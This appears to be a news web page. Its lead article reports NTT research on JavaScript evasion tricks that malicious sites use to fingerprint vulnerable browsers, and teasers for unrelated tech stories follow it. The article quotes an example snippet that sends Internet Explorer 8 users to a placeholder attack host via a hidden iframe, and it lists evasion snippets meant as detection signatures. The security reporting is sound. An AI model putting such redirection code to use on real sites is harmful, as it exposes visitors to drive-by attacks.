How evil JavaScript helps attackers tag possible victims – and gives away their intent

Countdown to ancient IE a telltale sign of malice

A honeypot project operated by Japanese comms company NTT has turned up a bunch of new approaches to malware obfuscation.

Yuta Takata of NTT's Secure Platform Laboratories has published an analysis at the Asia Pacific Network Information Centre (APNIC) here. In it, he wrote that since JavaScript can be used to identify different (and vulnerable) browsers, it's worth watching to see if malware authors are using it that way.

Takata's group identified five evasion techniques that all abuse differences between JavaScript implementations, he stated, which is more complex than familiar redirection attacks that look at the User-Agent and redirect victims to pages specific to their browser.

In other words, this code would redirect an Internet Explorer 8 user to an attack site, but leave others alone:

var ua = navigator.userAgent; 
     if(ua.indexOf(“MSIE 8”) > -1) { 
     var ifr = document.createElement("iframe"); 
     ifr.setAttribute("src", “http://mal.example/ua=”+ ua);

It matters, Takata said, because the evasion techniques identified in the research can serve as attack signatures.

The NTT team took two approaches to traffic collection: a "high interaction" honeyclient (a real browser designed to detect browser exploits), and a "low interaction" honeyclient that can "emulate many different client profiles, trace complicated redirections and hook code executions in detail".

Over several years, the NTT group collected and analysed 8,500 JavaScript samples from 20,000-plus malicious sites, and found five previously unseen evasion techniques as shown below.

Evasion technique Evasive code
Use of original object window.sidebar
Difference in array processing ["a","b",].length
Difference in string processing "\v"=="v"
Difference in setTimeout() processing setTimeout(10)
Difference in parseInt() processing parseInt("0123")

Takata wrote that of these setTimeout() provided the best indicator of compromise (IOC) – mainly because the other four aren't in current use.

That particular function helped attackers identify IE 8 and IE 9 browsers, because they return an "Invalid argument" error if a site asks them to process setTimeout(10); Firefox and Chrome don't.

That code turned out to be the strongest IOC of the five evasive code snippets NTT identified in its scan of more than 860,000 URLs: all of the 26 URLs that served up setTimeout(10) were in compromised websites, members of a mass "Fake jQuery" injection campaign. The other samples turned out to be either benign, or no longer in use. ®

Send us news

Mars race: China dreams of nuclear rockets, manned bases, and space elevators

We're looking forward to the late 21st-century colony wars

Over the next quarter century, China wants to set up a permanent base on Mars for "large scale development of the Red Planet," and install a sci-fi carbon-nanotube elevator to shuttle goods between the surface and spacecraft in orbit.

That’s according to the China Academy of Launch Vehicle Technology (CALT), the country’s largest rocket maker, which described a road-map outlining the Middle Kingdom's ambition to explore the unforgiving dust world. Missions to Mars are planned for 2033, 2035, 2037, 2041, and 2043 quite possibly using nuclear-propelled spacecraft.

In a speech, CALT’s President Wang Xiaojun said his state-owned organization first intends to send robots to Mars to collect samples of material to study back on Earth. These machines will also scout out good locations to develop a human settlement.

Continue reading

Bridging the observability gap

Trace the journey through all those microservices in the background

Sponsored In modern IT, visibility is everything. IT admins and Site Reliability Engineers (SRE) survive on their ability to see what's happening in their systems. Unfortunately, as systems get more sophisticated, it has become harder to see what they're doing. That's why the industry is promoting observability as the evolution of existing concepts like monitoring and metrics. Vendors are stepping up with tools to address a growing visibility gap.

Continue reading

Google: About that whole getting rid of third-party cookies thing – we're gonna need another year or so

Plan to reinvent advertising turns out to be more difficult than expected

Google, which makes the only major browser not blocking third-party cookies by default, has revised its commitment to phase out third-party cookies by 2022.

The super-corp's biscotticide is now scheduled to begin in mid-2023 and run through late 2023.

Third-party cookies refer to tracking files deposited in one's browser when visiting a website that includes code interacting with third-party domains. The firms associated with these domains, typically marketing and analytics businesses, check for the presence of their cookies across different websites and use this information to build marketing profiles and to target ads based on behavior.

Continue reading

These six proposed bipartisan antitrust laws put Big Tech in the cross-hairs – and a House committee just OK'd them

Well, it's a start

The US House Judiciary Committee this week approved half a dozen major bipartisan antitrust bills aimed at clamping down on the growing power of Big Tech and its monopolization of some markets.

The panel, led by Jerry Nadler (D-NY), debated for nearly 30 hours on Wednesday and Thursday to advance the wide-sweeping six-bill package. The proposed laws includes all sorts of measures to prevent companies like Google, Apple, Amazon, Microsoft, Facebook, and others from dominating their sectors of the technology industry.

There was likely plenty of lobbying and other wrangling going on in the back and foreground over the exact wording of the package. For instance, there was a concern by some lawmakers that Microsoft would end up avoiding certain provisions in the proposed acts that would otherwise hit Google and Apple. Tweaks were made – such as removing "mobile" from "mobile operating system" in the fine-print – to ensure no one was wriggling out.

Continue reading

You won't want that Linux bling if it comes from Pling: Marketplace platform has critical vulnerabilities

No one wants to be pwned by a drive-by RCE

A Berlin startup has disclosed a remote-code-execution (RCE) vulnerability and a wormable cross-site-scripting (XSS) flaw in Pling, which is used by various Linux desktop theme marketplaces.

Positive Security, which found the holes and is not to be confused with Russia’s Positive Technologies, said the bugs are still present in the Pling code and its maintainers have not responded to vulnerability reports.

Pling presents itself as a marketplace for creative folk to upload Linux desktop themes and graphics, among other things, in the hope of making a few quid from supporters. It comes in two parts: code needed to run your own bling bazaar, and an Electron-based app users can install to manage their themes from a Pling souk. The web code has the XSS in it, and the client has the XSS and an RCE. Pling powers a bunch of sites, from and to and

Continue reading

Would-be password-killer FIDO Alliance aims to boost uptake with new UX guidelines

Throws a bone to complex enterprise deployment, too

The FIDO Alliance, which operates with no smaller mission than to "reduce the world's over-reliance on passwords", has announced the release of new user experience (UX) guidelines aimed at bringing the more technophobic on board.

Launched back in 2013 as the Fast Identity Online Alliance, the FIDO Alliance aims to do away with passwords altogether through the introduction of standards-compliant "authenticators" including USB security dongles, fingerprint readers, Trusted Platform Modules (TPMs) and more.

While the organisation's standards, which were updated with the launch of FIDO2 in 2018, have enjoyed adoption in the majority of web browsers and with a range of companies, they're still seen as unusual and even inconvenient compared to the good ol' username and password combo – which is where the new UX guidelines come in.

Continue reading

UK's Vodafone network runs trials on standalone 5G in London, Manchester and Cardiff

These are networks that are not dragged down by LTE core

Vodafone has launched 5G SA (Standalone) trials in London, Manchester, and Cardiff in its largest test of the technology yet.

The commercial launch has allowed the carrier to experiment with new ways to commercialise its network, including network slicing – where a portion of network is dedicated to a specific customer for their exclusive use. It will also allow customers to test 5G SA devices on a live, public network.

Vodafone selected Ericsson's dual-mode 5G core network as the dedicated provider for this trial. It follows trials at Coventry University in 2020, and a separate trial in Spain.

Continue reading

What you need to know about Microsoft Windows 11: It will run Android apps

The operating system they said shouldn't exist

Microsoft on Thursday announced Windows 11, or tried to as an uncooperative video stream left many viewers of the virtual event flummoxed by intermittent transmission gaps in the opening minutes.

The technical issues proved bad enough that Matt Velloso, Technical Advisor to the CEO at Microsoft, suggested trying the YouTube video stream as an alternative to the Microsoft-hosted one.

But with some of the features already known as a result of a leaked build last week, the impact of the intermittent video dropouts was less than it might have been.

Continue reading

Russia spoofed AIS data to fake British warship's course days before Crimea guns showdown

Great powers clash while the rest of us sigh and tut at data feed meddling

Russia was back up to its age-old spoofing of GPS tracks earlier this week before a showdown between British destroyer HMS Defender and coastguard ships near occupied Crimea in the Black Sea.

Yesterday Defender briefly sailed through Ukrainian waters, triggering the Russian Navy and coastguard into sending patrol boats and anti-shipping aircraft to buzz the British warship in a fruitless effort to divert her away from occupied Crimea's waters.

Russia invaded Ukraine in 2014 and has occupied parts of the region, mostly in the Crimean peninsula, ever since. The UK and other NATO allies do not recognise Ukraine as enemy-held territory so Defender was sailing through an ally's waters – and doing so through a published traffic separation scheme (similar to the TSS in the English Channel), as Defence Secretary Ben Wallace confirmed this afternoon.*

Continue reading

Lego bricks, upcycled iPhone lenses used in new low-cost, high-res microscope

Full instructions given away for free, to 'nurture natural curiosity'

A trio of boffins at the Georg August University Göttingen and Münster University have put together a low-cost yet high-resolution microscope for educational users – using smartphone parts and Lego bricks.

"An understanding of science is crucial for decision-making and brings many benefits in everyday life, such as problem-solving and creativity," said Timo Betz, professor at the University of Göttingen and co-author of the paper detailing the project. “Yet we find that many people, even politicians, feel excluded or do not have the opportunities to engage in scientific or critical thinking.

"We wanted to find a way to nurture natural curiosity, help people grasp fundamental principles and see the potential of science."

Continue reading

Romance in 2021: Using creepware to keep tabs on your partner or ex. Aww

With this app, I thee stalk

Online stalking appears to be as much a part of modern relationships as lovingly sharing a single spoon and dessert in a dimly lit restaurant or arguing over who should put out the bins.

That's just one of the conclusions from antivirus merchant Norton's latest look at online trends which found that nearly one in 10 people in the US admit to using stalkerware or creepware to keep tabs on a partner.

What's more, the threat of cyber snooping works both ways, with those involved in relationships increasingly resigned to the fact that their significant other might be stalking them – either now or in the future.

Continue reading